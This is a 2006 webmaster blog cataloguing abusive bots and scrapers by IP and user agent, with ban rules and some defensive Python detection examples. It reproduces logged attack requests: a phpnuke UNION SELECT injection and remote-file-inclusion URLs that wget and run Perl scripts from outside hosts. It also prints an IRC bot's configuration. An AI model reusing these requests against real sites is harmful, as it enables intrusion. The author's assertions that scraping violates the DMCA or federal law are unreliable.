Sep 29, 2006

Web Scrapers Violate the Digital Millennium Copyright Act

The Digital Millennium Copyright Act makes it a crime to create software
that allows a user to get around any copy protection used to stop
theft of copyright content.

Companies that create bots that fake useragents to get around our blocks
violate the DMCA.

We need a class action lawsuit against the software authors that create web scrapers.

geosign-v47.fibrewired.on.ca abuse unknown bot

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

Robot fakes useragents.
Loads the robots.txt file and then loads files it is told not to.
Has fallen into the bot trap several times.

This bot holds this IP and is hosted on fibrewired.on.ca
Canada

added to domain ban

geosign-v47.fibrewired.on.ca,Unknown Canada bot

static.theplanet.com kostanay spam

ThePlanet is offering internet access to businesses so we have to be careful about banning that domain.

Verified robots list that need to be banned

70.86.137.162
a2.89.5646.static.theplanet.com


Update: I am fed up with this bot. It's trying to place orders on my store using only a name and city, and is copying all the keys off the pages.
92.3f.5746.static.theplanet.com 70.87.63.146
name : alex
city : kostanay

So everything from static.theplanet.com is now banned.

name=ahmet
city=kostanay
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)
70.87.63.146 92.3f.5746.static.theplanet.com

reversedns.resolve.ru abuse

NO AGENT-
72.36.245.205 72.36.245.205.reversedns.resolve.ru

Resolve Ltd. is a Russian hosting company which appears to be involved in fraud schemes. A search on the IP address will return a lot of spammed guestbooks, mostly for pills. Apparently the spammer specialised in targeting the Advanced Guestbook script. The bot is using both random user agents and proxy servers, and the referrer pointed to the domain hitairfare.com.

This robot was caught scanning with no agent, which is automatically blocked. To prevent entry by any of its other fake agents the domain needs to be added to the domain block list.

reversedns.resolve.ru,guestbook spam and Fraud

Sep 27, 2006

Just what is btcentralplus.com

We receive a lot of abuse from this domain and a lot of webmasters are blocking it.
But since the domain has no website it was not clear what it was.
After a long search I have discovered that it's British Telecom DSL.
See DSL report page. This was the only site that told what it was.

Why the lame techs at BT don't have a website at that domain is confusing, because not knowing what it is is getting BT customers globally banned.

btcentralplus.com should not be banned as it is an ISP.
It is not clear yet if DSL modems keep the same IP so we have to ban by IP until we know.

To the folks at BT Please put a website at www.btcentralplus.com

Sep 25, 2006

necbot/1.0 (nec labs america)

necbot/1.0 (nec labs america)
All Hits From svext.nec-labs.com 138.15.10.10

I can find no info on this bot.

The IP is registered to NEC but it's confusing as to why NEC has a bot. This might be banned later as we are not sure what it is.

OrgName: NEC Laboratories America, Inc.
OrgID: NLA-29
Address: 4 Independence Way
Address: Suite 200
City: Princeton
StateProv: NJ
PostalCode: 08540
Country: US

geosign-v47.fibrewired.on.ca bad bot

First the bot falls into a bot trap it found from reading the robots.txt file.
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

Just to make sure, it hits the bot trap again with another useragent
mozilla/4.0 (compatible; msie 5.0; windows xp) opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca


Then it tries to scan the site. Note how its user agent changes as it scans.

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

This one gets stopped by BB as improper headers
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

Stopped by BB
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
66.207.118.206 geosign-v47.fibrewired.on.ca

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
66.207.118.206 geosign-v47.fibrewired.on.ca

It just keeps hammering like this but never gets in.

So what is this bot doing?
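
The pattern described in this post (read robots.txt, request the trap it disallows, rotate the useragent) can be checked offline against an access log. The following is an added example, not M&M Autoban or Bad Behavior code; the trap path, the combined log format and the sample lines are assumptions constructed for the illustration.

```python
import re
from collections import defaultdict

# Trap directory: disallowed in robots.txt and never linked for visitors.
# The path name is a placeholder chosen for this example.
TRAP_PREFIXES = ("/bot-trap/",)

# Apache combined log format (assumed; adjust to your server's format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+)[^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

UA_IE = "mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)"
UA_OPERA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]"
UA_GALEON = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040218 Galeon/1.3.12"


def _line(ip, path, ua):
    return (f'{ip} - - [25/Sep/2006:10:00:00 +0000] "GET {path} HTTP/1.1" '
            f'200 512 "-" "{ua}"')


# Constructed sample log; the addresses are documentation ranges, not real hosts.
SAMPLE_LOG = "\n".join([
    _line("192.0.2.10", "/robots.txt", UA_IE),
    _line("192.0.2.10", "/bot-trap/index.php", UA_IE),
    _line("192.0.2.10", "/bot-trap/index.php", UA_OPERA),
    _line("192.0.2.10", "/index.php", UA_IE),
    _line("198.51.100.7", "/robots.txt", "examplebot/1.0 (constructed)"),
    _line("198.51.100.7", "/index.php", "examplebot/1.0 (constructed)"),
    _line("203.0.113.5", "/index.php", UA_IE),
    _line("203.0.113.5", "/about.php", UA_GALEON),
])


def analyze(log_text, trap_prefixes=TRAP_PREFIXES):
    """Return {ip: {"reasons": [...], "ban": bool}} for every IP in the log."""
    seen = defaultdict(lambda: {"robots": False, "trap_hits": 0,
                                "trap_after_robots": 0, "agents": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        state = seen[m["ip"]]
        path = m["path"].split("?", 1)[0]
        state["agents"].add(m["ua"].strip().lower())
        if path == "/robots.txt":
            state["robots"] = True
        elif path.startswith(tuple(trap_prefixes)):
            state["trap_hits"] += 1
            if state["robots"]:
                state["trap_after_robots"] += 1

    report = {}
    for ip, state in seen.items():
        reasons = []
        if state["trap_after_robots"]:
            reasons.append("read robots.txt, then requested a disallowed trap path")
        elif state["trap_hits"]:
            reasons.append("requested a trap path")
        if len(state["agents"]) > 1:
            reasons.append(f"{len(state['agents'])} different user agents from one IP")
        # Only a trap hit bans: several agents behind one address can also be
        # ordinary users sharing a NAT or proxy, so that is reported, not banned.
        report[ip] = {"reasons": reasons, "ban": state["trap_hits"] > 0}
    return report


def banned_ips(report):
    return sorted(ip for ip, entry in report.items() if entry["ban"])


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, "BAN" if entry["ban"] else "ok", entry["reasons"])
```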

Sep 24, 2006

baiduspider bad bot ignores robots.txt

baiduspider+(+http://www.baidu.com/search/spider.htm)
202.108.11.106
202.108.11.108
60.28.17.43

This is a Chinese search system that indexes sites written in Chinese, I think.
Since my sites are in English I don't understand why it's trying to index me.

It says to add "baiduspider" to your robots file. I did this months ago but it's back.
It is ignoring the robots.txt file.

The above IPs are in the blacklist as spammers. See link. You have to click on OPEN RBL and then, when the second window opens, click on LOOKUP. This will display all the block lists in red.


It has been added to the useragent ban list and is blocked but it just ignores the
error and keeps coming back. It's time to add the IPs to the server IP ban.

deny from 202.108.11.106
deny from 202.108.11.108
deny from 60.28.17.43

More work needed to find all its IPs.

64.34.173.76 lucy.electroclash.us BOT

Mozilla/7.0
64.34.173.76 lucy.electroclash.us

What is this Mozilla 7? That's invalid. Some kind of bot. The website has what looks like a guestbook on its front page.

It hit 2 of my domains and was stopped by BB as invalid.

compatible; MSIE 6; Win32; Mck - Is it a new bot?

User-Agent claimed to be MSIE- with invalid Windows version

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)

What is this useragent? It first looks ok stating
compatible; MSIE 6.0; Windows NT 5.1;
But then it has a second part which looks like the useragent is starting over.
Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)
Inside this strange string is another browser version.
compatible; MSIE 6; Win32; Mck

What is MSIE 6? This is invalid.
What is Win32? This is also an invalid version.
What is Mck?
Why is Mozilla/4.0 repeated?

If this is not some strange proxy then this is a new bot.

This is banned by BB as an invalid Windows version.

88.198.38.230 proxy.adressendeutschland.de harvester

www.adressendeutschland.de
88.198.38.230 proxy.adressendeutschland.de

This bot is a spammer's dream. It is creating a database of all websites'
NAME, ADDRESS, PHONE# & EMAIL ADDRESS. Once finished it will have a search option to look up the data.

This is why you should not post your name, address and phone# on your website. Give this data only to customers who place orders. Or require a customer to have an account before it's displayed. New customers only need a contact form.

It claims it will not display anyone not in a "Trade Register". I don't know what that is, but if it's true why are they scanning non-business websites?

Read the translation of what they are doing here.

Email/contact info harvester.

Sep 20, 2006

hostnoc.net abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
83 hits From 6419136165.hostnoc.net 64.191.36.165

The above is one of the suspected useragents that always turns out to be a robot and not a browser. A search of Google shows a lot of abuse from this domain so it's banned.


domain ban list

hostnoc.net,pro spam host

Sep 19, 2006

LWP::Simple/5.48 FastCounter Robot using LWP

LWP::Simple/5.48
204.71.191.109

The bcentral FastCounter sends out a robot to check your link and verify your site. However this robot doesn't have its own useragent; it uses "LWP::Simple/5.48", which is banned by most everyone as a spambot.

Attempts to report this failed because both the chat and email contact forms do not work on the fc.bcentral.com site. I also just discovered that FastCounter free is no longer free unless you had already created your counters before 2005. I have about 15 such counters so mine are still working.


If you have trouble with your counters not working you will have to add the above IP to the whitelist.

Just what is blogslive - Admitted Data-Miner

blogslive (info@blogslive.com)
64.158.138.84 floodgate.intelliseek.com

Blogslive will visit your blog the same day you create it.
blogslive.com is just a GoDaddy parked webpage; no such site exists.
The website intelliseek.com also does not exist; it redirects to nielsenbuzzmetrics.com

To quote this website.
With solid data-mining technology, superb research and Nielsen’s unrivaled experience in media measurement and client services, we help today’s companies, brands and business professionals better understand the influence and impact of CGM on products, issues, reputation and image.


So blogslive is what I suspected all along: it's a fake robot for nielsenbuzzmetrics.com used to data-mine your website so they can sell your content to others. Can you say copyright violation?


Banned Banned Banned....................

64.233.182.136 fakes google

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)
64.233.182.136


This IP was caught faking the Google proxy, which is banned anyway because it's a proxy.

Sep 17, 2006

enmaxenvision.net dragonfly bot

dragonfly(ebingbong@playstarmusic.com)
72.29.233.186 a72-29-233-186.enmaxenvision.net

enmaxenvision.net redirects to enmax.com. Enmax has something to do with utilities; I can't tell what they are, but they are not an ISP and should not be running a robot.

Both the domain and useragent should be banned.



enmaxenvision.net,Email harvestor

stpxc02.sentechsa.net spam tool

isc systems irc search 2.1
168.210.90.181 stpxc02.sentechsa.net

Caught this spam harvester running on a domain that has no website.



Add to domain ban
sentechsa.net,Spam Email Harvestor

wmstream.libertyleague.com SpamBot

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
69.41.171.138 wmstream.libertyleague.com

This is an MLM company. Could not find any tracks in Google; must be a new spambot they have started up this week.


This domain should be added to the ban list.

I do see a court settlement on pyramid marketing here

Domain ban
libertyleague.com,MLM co running Unknown Bot

Sep 13, 2006

ns1.downriterotten.com abuse

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
72.232.31.82 ns1.downriterotten.com

Yes the above useragent is one of the known spam tools.
This domain has a page saying they will be back up soon while a google of the domain shows posting on adult webmaster forums.

This domain is banned for using spam tools.



downriterotten.com,Caught using spam tools

Sep 12, 2006

trishuli.cs.UMBC.EDU spambot

Java/1.5.0_02
130.85.94.152 trishuli.cs.UMBC.EDU

This is known spam software used to harvest email addresses.
It is running in the Computer Science Dept of the University of Maryland.

This has been reported.

static.88-198-43-39.clients.your-server.de bot

88.198.43.39 static.88-198-43-39.clients.your-server.de

From Germany has no agent.


It's not clear what this bot is trying to do. It's always on the same IP and only hits the top page.

dynamic.apogeenet.net Guestbook Spammer

ADD Spam robot Trap
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)
64.192.20.104 dynamic.apogeenet.net

After doing a search I see that this domain often turns up on guestbooks posting spam so this domain is now added to the domain block.

dynamic.apogeenet.net,Guestbook Spammer

IRLbot/2.0 bot banned

Request : /contact.html
IP : 128.194.135.81
Agent : IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)

This bot didn't make it into the site. It went straight to an old contact form that had been removed due to spam and hit it 7 times.

This bot was banned long ago for being a waste of bandwidth, being that it only takes our bandwidth and gives nothing back.

To quote the website.
"Texas A&M research project sponsored in part by the National Science Foundation that investigates algorithms for mapping the topology of the Internet and discovering the various parts of the web."
That's great and all but Texas A&M needs to use its own bandwidth for this project and not ours.

Mozilla/5.0 Agent by itself

Agent: Mozilla/5.0
218.209.235.203
Agent: Mozilla/5.0
195.42.75.75
Agent: Mozilla/5.0
203.153.45.50

As you can see the same bot hit from 3 places one after another.

I have seen this before being used by the hackers; it is clearly some type of hack tool or script.

To prevent false alarms this cannot be added to the useragent ban list. It must be hard coded in as an exact match, which will be done in the next release of MMAUTOBAN, v3.3.
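
Why the bare "Mozilla/5.0" agent needs an exact match, together with the checks that the "Mck" and csccorporatedomains.com agents on this page would trip, shown as an added example. This is not MMAUTOBAN or Bad Behavior code: the function name, the two list names and the assumption that the ordinary ban list matches by substring are made up for the illustration, and the Firefox string is a constructed sample.

```python
import re

# Ordinary ban list, assumed here to match anywhere inside the agent.
# The entries are agents this page reports as banned.
BANNED_SUBSTRINGS = ("baiduspider", "lwp::simple", "irlbot", "sproose/")
# Exact-match list: refused only when the whole header equals the entry.
BANNED_EXACT = ("mozilla/5.0",)

# Agents quoted on this page.
UA_MCK = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; "
          "Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)")
UA_CSC = "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"
# Constructed sample of a normal Firefox agent of the period.
UA_FIREFOX = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) "
              "Gecko/20060909 Firefox/1.5.0.7")


def check_user_agent(ua, substrings=BANNED_SUBSTRINGS, exact=BANNED_EXACT):
    """Return the reasons to refuse or distrust `ua`; an empty list means no finding."""
    agent = (ua or "").strip().lower()
    if agent in ("", "-"):
        return ["no user agent"]

    findings = []
    if agent in exact:
        findings.append("exact-match ban: " + agent)
    for needle in substrings:
        if needle in agent:
            findings.append("substring ban: " + needle)

    # A browser agent starts with one Mozilla/ token; a second one inside the
    # comment means two strings were glued together.
    if agent.count("mozilla/") > 1:
        findings.append("nested mozilla/ token")

    # The ordinary MSIE samples on this page carry one "msie major.minor" token.
    tokens = [t.strip() for t in re.findall(r"msie ([^;)]*)", agent)]
    if len(tokens) > 1:
        findings.append("multiple msie tokens")
    for token in tokens:
        if not re.fullmatch(r"\d+\.\d+\w*", token):
            findings.append("malformed msie version: " + token)
    return findings


if __name__ == "__main__":
    for ua in ("", "Mozilla/5.0", UA_FIREFOX, UA_MCK, UA_CSC, "LWP::Simple/5.48"):
        print(repr(ua), "->", check_user_agent(ua))
    # What goes wrong if the bare agent is put on the substring list instead:
    print(check_user_agent(UA_FIREFOX, substrings=BANNED_SUBSTRINGS + ("mozilla/5.0",)))
```

The nested-token and MSIE checks only report an anomaly; as the "Mck" post says, a proxy could also produce such a string, so they are better used as a reason to look closer than as an automatic ban.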

Sep 11, 2006

sproose/0.1 (the Sproose Goose bot)

GET HTTP/1.0
Agent: sproose/0.1 (sproose bot; http://www.sproose.com/bot.html; crawler@sproose.com)
From IPs
38.100.225.7
38.100.225.8
38.100.225.12
Most likely others but we are not keeping track.


The Sproose Goose is banned because it's a startup with no content. Scrapers often use the fake startup scam to get past blocks. Unless the Sproose Goose actually does fly, they will stay banned. Right now we do not know if this is a real company or a scraper.

Robot was caught following links it should not be able to see because it's banned. The only way it could be doing what it's doing is if it were following Google listings back to our site.

Added to UA Start file
sproose/0.1,Fake Startup co

Sep 9, 2006

201.200.22.146 Hacker

ADD ALARM: */select/* injection
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0-0-pwd-0-aid/**/FROM/**/nuke_authors GET HTTP/1.1
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; simbar enabled; simbar={ff31d371-c0bf-4f98-ac32-ccaee7d5f828})
201.200.22.146

The above attempted union injection hack of the phpnuke database was detected and the IP autobanned by M&M Autoban.



One wonders why I am seeing a lot of hackers with simbar enabled in the user agent.
None of my regular visitors have simbar.

Sep 7, 2006

microsoft.com spoofed?

Blacklist Domain Ban: microsoft.com Entire range spoofed by hackers
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; wow64; sv1)
131.107.0.96 tide526.microsoft.com

Word is that someone is using microsoft ips.

One would think MS would be using msie 7 if it was real.

Update I started seeing what looked like valid users so this domain was removed from the ban list but is being watched.

Bad Behavior Whitelist adjustment

Bad Behavior has some problems with known good bots. You need to adjust your whitelist to let them in.

Edit whitelist.php and change $bb2_whitelist_ip_ranges to:

$bb2_whitelist_ip_ranges = array(
// Looksmart
"64.242.88.60",
// Scooter/3.3
"66.94.232.246",
"66.94.238.51",
"66.94.238.52",
// YahooSeeker/1.2
"68.142.230.184",
// FreeFindRobot Good bot with some header problems
"63.203.65.217",
// CJ.com banner tester
"216.34.209.23",
);

These are known bots that BB blocks due to header problems. Without this change altavista scooter will not be able to index your site.
CJ.com has been added because the new robot they use is blocked as a spambot.

security.lightspeedsystems.com abuse

bad-behavior 400 Required header 'Accept' Missing.
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
66.17.15.154 66-17-15-154.security.lightspeedsystems.com

Thought to be a scraper. See other info here

Reports now say that this is content filtering.
lightspeedsystems.com
If it is, it's the worst bot ever written because it fakes its useragent and sends illegal headers. Clearly not the tech leader it says on the website.

Writing to lightspeed and waiting for a reply.

Update:
lightspeedsystems.com refuses to reply to my emails so it's banned. I don't care what they say it is. It is abuse because they are faking the useragents and are using improper headers and they do not identify themselves in the scan.


added domain ban
lightspeedsystems.com,Wont reply to emails abuse

Also banned by all blogs using Bad Behavior

Sep 6, 2006

nat.la.valueclick.com Java/1.5.0

Java/1.5.0_06
64.70.54.15 nat.la.valueclick.com
cjnetworkquality; http://www.cj.com/networkquality
64.70.54.15 nat.la.valueclick.com

Java/1.5.0_03
216.34.209.23 mx4.cj.com

Valueclick and cj.com are the same company. It is unclear why they are using this useragent. This useragent is blocked as a known spam tool; they should not be using it.

This has been reported to valueclick and cj.com.

UPDATE
After 1 month CJ sent this reply to the problem of a broken useragent string.

For further details, regarding our Network Insight Spider, please access the following URL:
http://www.cj.com/networkquality/


Well....... Hummm what am I to say to that answer?

And people wonder why customer service people have a bad rep.

What to do.
This looks like a legit bot that needs to be let in, however cj would not reply if it was the real cj bot or not.
The ip needs to be added to the whitelist in BB and M&M Autoban however I have not seen it this month so it may be fixed. Will have to wait and see.

But anyway, no point in writing to them again. All they gave me after 1 month was the URL that's in the normal useragent string.

How to protect your site

Protect your website in realtime.
As seen on PC Magazine

Protect your PHP site and scripts from bad abusive robots that use up your bandwidth.

Have you checked your logs only to find you have more robot or unknown users than you have real visitors?

Examples of what is visiting your site
Robots watching to see if your domain expires
Robots from some startup search engine no one will ever use
Robots from search engines in languages you don't serve
Robots from companies trying to see if you violated some copyright
Robots from some government website monitoring for some unknown content
Robots trying to collect email addresses
Robots trying to hack into your site
Robots pinging your scripts in an attempt to get your software to list where they came from
Robots probing for scripts called modules.php posting.php submit.php and others
Robots using random agents to avoid blocking.
Hackers trying to use union injections on your database

Copyright owners have the legal right under the DMCA to reserve the right to view content only to website visitors. Webmasters have the legal right under DMCA to block access to anyone who wants to store or copy website content. It is also a crime under US law to use any trick or false information to gain access to a computer system. Running a robot that pretends to be a user by faking its useragent is a crime under US law because it is using false information to gain access to a computer system.


M&M Autoban can be used as a Bot-Trap to autoban every ip that hits a trap listed in your robots file. It is included in all of your php scripts to check the user against the ip ban list and then verify that the visitor qualifies to visit your website.

You cannot just send spam bots into an endless fake email loop unless you have unlimited bandwidth and you don't care about a slow server. And it doesn't hurt them anyway. A spam bot must be terminated ASAP with as little bandwidth being used as possible.


Works with Bad Behavior but BB is not required.

Works on all PHP scripts needs no database!
Prevents Union Injections and known hacks.
Tracks agents
Set blocking list anyway you like

Now works With Wordpress.

Click on downloads to the right.

csccorporatedomains.com abuse Corp. Snooper

Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.107 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.126 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
64.124.14.126 csccorporatedomains.com
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040218 Galeon/1.3.12
64.124.14.120 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
64.124.14.120 csccorporatedomains.com
Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)
64.124.14.120 csccorporatedomains.com
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
64.124.14.120 csccorporatedomains.com

All of the above were blocked by bad-behavior as having defective headers.
Only 1 old win95 bot gets past BB but is blocked by our domain ban.
mozilla/4.7 [en] (win95; u)
64.124.14.120 csccorporatedomains.com
mozilla/4.7 [en] (win95; u)
64.124.14.124 csccorporatedomains.com


This has now all been tracked back to a service called "Brand Audit and Patrol" it visits our sites to see if we are saying bad things about brand names. And to check if we have brand logos.

Problem is that they are using a defective robot that is blocked by all blogs that use Bad Behavior. It's likely that this patrol bot cannot even see 60% of all the blogs it's trying to scan due to poor programming.

Also this robot fakes useragents to gain access to websites in violation of US federal law, which makes it a crime to use false information and/or any trick to gain access to a computer system.

This domain is banned for wasting bandwidth and using false information and tricks to gain access to website content.

csccorporatedomains.com,brand audit patrol

ip.secureserver.net Funny

64.202.160.65
Blacklist Domain Ban: ip.secureserver.net Godady web hosting -
Unknown bots
http://www.google.com/search?hl=en&q=robot+blocking+scripting

Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr
1.1.4322)

Domain: nat-64-202-160-65.ip.secureserver.net


secureserver.net doesn't have a website; it redirects to
http://www.securepaynet.net/gdshop/404error.asp which is the GoDaddy
payment service.

How does someone run Windows on a GoDaddy server? They don't. It's a bot
and it's scanning for info on who is blocking bots. Funny. What does this
tell you?

We were banning just part of this domain but now suggest banning the
entire thing.



secureserver.net,Godady web hosting - Unknown bots

Panscient Data Services

38.99.203.110 Panscient_Data_Services.demarc.cogentco.com

Originally the bot was detected scanning the site using a fake useragent. This was reported to cogentco.com, who sent back a canned reply that this was a nice bot and followed the robots file.

My original request for info on who ran the bot and why it was faking the useragent of a browser was ignored.

I replied back to abuse and asked if cogentco.com owned this bot and why it was using a fake useragent if it was a nice bot. But my questions were ignored and all I got back was the same canned reply.

cogentco.com knows about this bot, allows it to operate, hides the identity of its owner and ignores complaints about it.

This bot was built by www.panscient.com it is unclear if they own it.

At Panscient Technologies we design, build and operate custom internet search engines that unlock the hidden structure of web data.
Using state of the art AI technology, Panscient Technologies' software analyzes web sites for their information content and compiles the data into a searchable index.


Yeah right, state of the art scraping.

At this time it is unclear who else uses this bot because it's stealth.

Add to domain ban list
Panscient_Data_Services.demarc.cogentco.com,Abuse

or to the ip ban on your server 38.99.203.110

nodomaintransfer21.com Singapore peepsurf.com

NO AGENT-
66.139.76.245 nodomaintransfer21.com

This domain redirects to peepsurf.com which is a proxy. Since the URL being attempted was one that spammers hit I suspect they were trying to get by my blocks. I don't know why the spam never gets posted even when they get past the block. Lamers....

I tested this proxy by taking it to the bot trap and got this.

210.193.49.199 199.210-193-49.idc-colo.qala.com.sg It passed my useragent.

I cannot tell where they got the nodomaintransfer21.com from. It did not come from that proxy; they must be running more than one. Both need to be banned.

See post on guestbook spammer running on nodomaintransfer22.com

Domain Ban.
idc-colo.qala.com.sg,Singapore peepsurf.com proxy
nodomaintransfer21.com,Singapore peepsurf.com proxy

Union Injection hackers

Ever since I posted on my new anti union injection module hackers have been trying to hack my forums. Someone tell me something. Perhaps I don't understand this, but why would a hacker show me just how he hacks a site so I can take that info and adjust my script to block such hacks?

All his attempts were blocked even by my alpha script.

modules.php?basepath=http://paupal.info/folder/cmd1.gif?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo1.txt;perl%20mambo1.txt;rm%20-rf%20mambo1.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://expl0itz.com/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch


hypernet.ch is banned

Here is part of his IRC script code.
my $linas_max='4';
my $sleep='5';
my @adms=("xxxxx","ok","mos","KKTeam");
my @canais=("#phpnuke");
my $nick='shutup';
my $ircname ='Stop';
chop (my $realname = 'uname -rs');
$servidor='mushu.tetovalive.de' unless $servidor;
my $porta='8200';
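
The request logged in the 201.200.22.146 post pads UNION SELECT with `/**/` comments, and the requests in this post pass a remote URL in the `basepath` parameter. A check that normalizes the query string before matching catches both; the following is an added example, not the M&M Autoban module, and the function names, the `url_params_ok` allowlist and the constructed sample requests (with the placeholder host `attacker.example`) are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")
REMOTE_URL = re.compile(r"^(?:https?|ftp)://")

# Request quoted in the 201.200.22.146 post on this page.
LOGGED_UNION = ("modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea"
                "&instory=/**/UNION/**/SELECT/**/0-0-pwd-0-aid/**/FROM/**/nuke_authors")
# Constructed samples.
DOUBLE_ENCODED = "modules.php?q=1%2520UNION%2520ALL%2520SELECT%25201"
REMOTE_INCLUDE = "modules.php?basepath=http://attacker.example/cmd.txt?&cmd=id"
BENIGN = "modules.php?name=Search&query=student+union+selects+officers"


def normalize(value, max_rounds=3):
    """Undo stacked URL-encoding, turn SQL comments into spaces, fold case and whitespace."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = SQL_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def naive_check(target):
    """The check that comment padding defeats: a plain substring test."""
    return "union select" in unquote_plus(target).lower()


def inspect_request(target, url_params_ok=()):
    """Return the alarms raised by one request target (path plus query string).

    url_params_ok names parameters that legitimately carry a URL on this site.
    """
    alarms = []
    query = target.partition("?")[2]
    for name, raw in parse_qsl(query, keep_blank_values=True):
        name = name.strip()
        value = normalize(raw)
        if UNION_SELECT.search(value):
            alarms.append(f"{name}: union select")
        if REMOTE_URL.match(value) and name not in url_params_ok:
            alarms.append(f"{name}: remote url")
    return alarms


if __name__ == "__main__":
    for target in (LOGGED_UNION, DOUBLE_ENCODED, REMOTE_INCLUDE, BENIGN):
        print(naive_check(target), inspect_request(target), target[:60])
```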

sitescripts.com link checker

sitescripts.com link checker
66.113.130.183 lsh158.siteprotect.com

This bot looks like it's using a link checker downloaded from sitescripts.com

I think this is a scraper. Whatever it is, it's pretending to be sitescripts.com

siteprotect.com has no website so it's suspect right out of the box.

It's banned by agent and domain.

coli.uni-saarland.de / answerbus bot

This bot first came in using an agent for a text browser. Clearly fake.

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.226 cluster-7.coli.uni-saarland.de

After a week they changed user agents to.

answerbus (http://www.answerbus.com/)
134.96.1.195 answerbus.coli.uni-saarland.de

Now they are back to using a fake text browser agent. Perhaps it's 2 bots.
lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.221 cluster-2.coli.uni-saarland.de

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a
134.96.104.220 cluster-1.coli.uni-saarland.de



